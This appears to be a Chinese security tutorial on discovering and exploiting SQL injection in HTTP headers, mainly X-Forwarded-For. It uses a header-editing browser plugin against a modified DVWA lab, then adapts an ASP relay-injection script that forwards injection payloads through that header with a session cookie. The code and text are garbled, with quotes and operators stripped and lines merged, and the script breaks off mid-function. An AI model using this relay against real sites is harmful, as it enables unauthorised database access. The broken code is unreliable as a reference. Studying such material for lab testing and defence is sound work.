HTTP头注入的发现和工具化利用精选.docx

目前市面上web漏扫均可以轻易的检测出以GET或POST方式传参的sql注入点，在实际测试过程中，笔者发现多数漏扫检测HTTP头注入问题的能力还不是太理想，这里分享下对于HTTP头注入的发现和利用过程，欢迎各位大牛批评指正。0x01、HTTP头注入的发现推荐使用安装了Modify Headers插件的火狐浏览器对目标站点进行信息收集，该插件可以自定义HTTP 头信息，截图如下：界面很简单，其中select action下拉单中的三个选项中modify比add优先级高，filter为过滤头字段操作，这里以新增http头字段X-Forwarded-For为例，下图红框中最前面选择add，紧跟着写入X-Forwarded-For，然后输入自定义的数值：我这里输入“x-for;xxoo!--”(不含引号)，配置完成后依次点击save、确定即完成配置。然后使用火狐浏览器浏览存在X-Forwarded-For sql注入漏洞的站点，这里笔者略微改动下dvwa，以配合测试，如图：用配置好的火狐登录dvwa后，点击SQL injection选项，user id随便输入后点击submit，弹出典型的sql注入报错页面如图：实际测试中，我们可以同时定义多个http head字段，然后浏览目标网站，进而发现漏洞，用该配置浏览器上网，常有意外收获，这里贴一张实测截图：0x02、HTTP头SQL注入的工具化利用漏洞发现了，下面讲讲利用。多数注入工具仅能覆盖http头中的cookie、user-agent等字段，对于X-Forwarded-For 等部分字段并不能全面覆盖。对于X-Forwarded-For sql注入，网上多是通过抓包增加“X-Forwarded-For ：*”内容，然后利用Sqlmap –r 方式对其注入，笔者曾使用sqlmap1.0,同时测试变更level参数等操作，最终并未成功利用，这里还望实验成功的大牛指点。下面笔者介绍一个利用寂寞的刺猬中转注入实现工具化利用的方法。 在寂寞的刺猬的中转注入代码中添加头字段X-Forwarded-For并赋值，值得注意的是这里不需要url编码和空格替换，代码略作修改后如下：?%‘感谢寂寞的刺猬sqlStr=request(g)存在注入点的文件actionUrl=37/dvwa/vulnerabilities/sqli/?id=Submit=Submit来源URLrefUrl=37/dvwa/vulnerabilities/sqli/添加cookie信息，实现过认证注入cookieStr=security=low; PHPSESSIDcb450bd3632e2bab6d30a31发起HTTP请求response.writePostData(actionUrl,sqlStr,cookieStr,refUrl)构造HTTP头注入数据包Function PostData(PostUrl,PostStr,PostCok,PostRef) ?Dim HttpSet Http = Server.CreateObject(msxml2.serverXMLHTTP)With Http.Open POST,PostUrl,False.SetRequestHeader Content-Length,Len(PostStr).SetRequestHeader Content-Type,application/x-www-form-urlencoded.SetRequestHeader Referer,PostRef.SetRequestHeader Cookie,PostCok.SetRequestHeader X-Forwarded-For,PostStr.Send GPostData = .ResponseBodyEnd WithSet Http = NothingPostData =bytes2BSTR(PostData)End FunctionFunction bytes2BSTR(vIn)Dim strReturnDim I, ThisCharCode, NextCharCodestrReturn = For I = 1 To LenB(vIn)ThisCharCode = AscB(MidB(vIn, I, 1))If ThisCharCode H80 ThenstrReturn = strReturn Chr(ThisCharCode)ElseNextCharCode = AscB(MidB(vIn, I + 1, 1))strReturn = strReturn Chr(CLng(ThisCharCode) * H100 + CInt(NextCharCode))I = I +